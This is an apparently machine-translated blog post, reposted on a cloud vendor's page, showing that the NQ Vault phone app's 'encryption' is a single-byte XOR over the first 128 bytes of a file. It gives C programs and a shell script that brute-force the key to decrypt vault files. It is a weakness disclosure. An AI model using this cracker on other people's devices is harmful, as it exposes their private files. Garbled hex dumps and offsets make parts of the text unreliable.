How can I get rid of "netqin private space (NQ Vault)" in three days )"

Source: Internet
Author: User

How can I get rid of "netqin private space (NQ Vault)" in three days )"


What is "netqin private space (NQ Vault )"
"Wangqin private space" (NQ Vault) is a mobile phone encryption APP. It allows users to set a private password and "encrypt" photos, texts, or other data ". For example, if an attacker needs to access the device to view the content, the attacker needs to obtain the private password. Even If attackers drag the data from the device, it is useless because the data is encrypted.
NQ Vault () has a good rating in the Google store:
1. The most popular applications, with more than 30 million users worldwide
2. CTIA-Techlicious 2012, CTIA Award
3. PC Magazine-PC Magazine recent App
4. TRUSTe-income "TRUSTe Privacy Seal"
5. Global Mobile Internet conference-top 50
In addition, wangqin's promotional slogans are also good-hiding all the secrets on your mobile phone!
In the next three days, I will demonstrate how attackers can drag the encrypted data in the "netqin private space (NQ Vault)" and read the original file in several seconds!
Day 1

I used gimpto create a 1-hour image named test.png] and run the following command:
Echo NINJADOGE24> test.png
‍‍And use NQ Vault v6.1.00.22 to encrypt it. The password is 2424.
The original file test.png is as follows:
0000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452. PNG ...... IHDR
0000010: 0000 0001 0000 0001 0802 0000 0090 ...... wS
0000020: de00 0000 0970 4859 7300 b100 0003 ...... pHYs .......
0000030: b101 f583 ed49 0000 0007 7449 4d45 07df ...... I ...... tIME ..
0000040: 0401 0319 3a3d ca0b 0c00 0000 0c69 5458 ......: = ...... iTX
0000050: 7443 6f6d 6d65 6e74 0000 0000 00bc aeb2 tComment ........
0000060: 9900 0000 0f49 4441 5408 1d01 0400 fbff ...... IDAT .......
0000070: 00ff 0000 0301 0100 c706 926f 0000 0000 ....
0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47 IEND. B '. NINJADOG
0000090: 4532 340a E24.
Vault's sqlite database tells us where to find the encrypted file

After the file is encrypted, 1427858907181.png:
0000000: 8d54 4a43 090e 1e0e 0404 0409 4d4c 4056. TJC ...... ML @ V
0000010: 0404 0405 0404 0c06 0405 0404 0494 ...... sW
0000020: da04 0404 0d74 4c5d 7704 0407 b504 0407 ...... tL] w .......
0000030: b505 f187 e94d 0404 0403 704d 4941 03db ...... M ...... pMIA ..
0000040: 0005 071d 3e39 ce0f 0804 0404 086d 505c ......> 9 ...... mP \
0000050: 7047 6b69 6961 6a70 0404 0404 04b8 aab6 pGkiiajp ........
0000060: 9d04 0404 0b4d 4045 500c 1905 0004 fffb ...... M @ EP .......
0000070: 04fb 0404 0705 0504 c302 966b 0404 0404 ....
0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47 IEND. B '. NINJADOG
0000090: 4532 340a E24.
Interestingly, I thought he would encrypt all the content, including NINJADOGE24 at the end.
Then I use the http://jdejong.net/tools/bitwisecalculator.php tool and the results are as follows:
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49
XOR
8D 54 4A 43 09 0E 1E 0E 04 04 04 09 4D
=
04 04 04 04 04 04 04 04 04 04 04 04 04 04
Wow, have I mentioned how many advanced versions of NQ Vault need to be paid $7.99 every year? I bet he is using the XOR2048 Enhanced Mode for encryption.
Day 2
Write an XOR encryption/decryption program.

//xor.c#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]){    FILE *file_a, *file_b;    int char_a, char_b;        file_a = fopen(argv[1], "r");    file_b = fopen(argv[2], "r");        while((char_a = getc(file_a)) != EOF && (char_b = getc(file_b)) != EOF)            putchar(char_a ^ char_b);                fclose(file_a);    fclose(file_b);            return EXIT_SUCCESS;}


In this case, a 1-pixel jpg file is used.
0000000: ffd8 ffe0 0010 4a46 4946 0001 0101 ...... JFIF .....'

0000010: 0060 0000 ffe1 0352 4578 6966 0000 4d4d. '... RExif... MM
0000020: 002a 0000 0008 0005 5100 0004 0000 ...... Q .......
0000030: 0000 0000 5101 0003 0000 0001 0001 ...... Q ...........
0000040: 5102 0001 0000 0300 004a 0000 5103 Q ...... JQ...
0000050: 0000 0001 0000 0000 5104 0001 0000 ...... Q .......
0000060: fc00 0000 0000 0000 0000 0000 0033 ..
0000070: 6600 0099 0000 cc00 00ff 002b 0000 2b33 f ...... + 3
0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000. + f... + ..
0000090: 5533 0055 6600 5599 cc00 55ff 0055 U3.Uf. U...
00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff ...... 3 ...... f .........
00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00 ...... 3 ...... f .......
-- Snip --
0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7 ................
20175a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5 ................
20175b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311 ................
20175c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49 .?.... (... NI
Listen 5d0: 4e4a 4144 4f47 4532 3420 0d0a NJADOGE24 ..
Encrypt 4815162342:
0000000: 3314 332c ccdc 868a 858a cccd cdcd ccac 3.3 ,............
0000010: ccac cccc 332d cf9e 89b4 a5aa cccc 8181 ...... 3 -..........
0000020: cce6 cccc ccc4 ccc9 9dcc ccc8 cccc cccd ................
0000030: cccc 9dcd cccf cccd cccc ................
0000040: 9dce cccd cccc cfcc cc86 9dcf cccd ................
0000050: cccc cccd cccc 9dc8 cccd cccc cccd ................
0000060: 30cc cccc ccff cccc 0 ...............
0000070: aacc cc55 cccc 00cc cc33 cce7 cccc e7ff ...... U ...... 3 ......
0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000. + f... + ..
0000090: 5533 0055 6600 5599 cc00 55ff 0055 U3.Uf. U...
00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff ...... 3 ...... f .........
00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00 ...... 3 ...... f .......
-- Snip --
0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7 ................
20175a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5 ................
20175b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311 ................
20175c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49 .?.... (... NI
Listen 5d0: 4e4a 4144 4f47 4532 3420 0d0a NJADOGE24 ..
Key:
0000000: cccc ................
0000010: cccc ................
0000020: cccc ................
0000030: cccc ................
0000040: cccc ................
0000050: cccc ................
0000060: cccc ................
0000070: cccc ................
0000080: 0000 0000 0000 0000 0000 0000 0000 ................
0000090: 0000 0000 0000 0000 0000 0000 0000 ................
00000a0: 0000 0000 0000 0000 0000 0000 0000 ................
00000b0: 0000 0000 0000 0000 0000 0000 0000 ................
-- Snip --
0000590: 0000 0000 0000 0000 0000 0000 0000 ................
Listen 5a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
Listen 5b0: 0000 0000 0000 0000 0000 0000 0000 ................
Listen 5c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
Listen 5d0: 0000 0000 0000 0000 0000 0a .............

The content after the first 128 bytes remains unchanged. This is definitely the best encryption method in history!
Let's try to use a password like 001,002,003 to see if any information is found.
Password key
000 30
001 31
002 32
003 33
004 34
..............
010 4f
011 50
012 51

 

..............
2424 04
4815162342 cc

Okay, I admit I'm a little interested now. Because after the password is, the whole rule seems sorry.

In any case, trying to recreate generateKey (password) is meaningless.

I have a hunch that I will use brute force cracking, from 00 to ff (that is, 0 ~ 255) until I get a valid file.

Day 3

Modify the XOR encryption/decryption program I wrote:
// vault-crack.c#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]){    FILE *file_a;    int char_a, char_b = strtol(argv[2], NULL, 10), i = 0;        file_a = fopen(argv[1], "r");        while((char_a = getc(file_a)) != EOF)        {            if(i < 128) putchar(char_a ^ char_b) && i++;        else putchar(char_a);    }        fclose(file_a);            return EXIT_SUCCESS;}

Brute-force cracking is not as difficult as imagined
#!/bin/shfor i in `seq 0 255`; do    ./vault-crack $1 $i > $1.decrypted        if [ `file $1.decrypted --brief --mime-type` != "application/octet-stream" ]        then        echo "Key = $i" && exit    fidone

Compile the vault-crack.c, put the script in the same directory as the file encrypted with vault, and finally use the following command to decrypt the file
./Vault-crack.sh ENCRYPTED_FILE
Success!

Update

Bkerler and phaeilo point out the key code for generating the key as follows:
Key = password. hashCode () & 0xff;

The hashCode function is defined by Java:
static int hashCode(String password){    int h = 0;    for (int i = 0; i < password.length(); i++)    {        h = 31*h + password.charAt(i);    }        return h;}

However, the key still needs to be cracked, because the password is not known for decryption.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.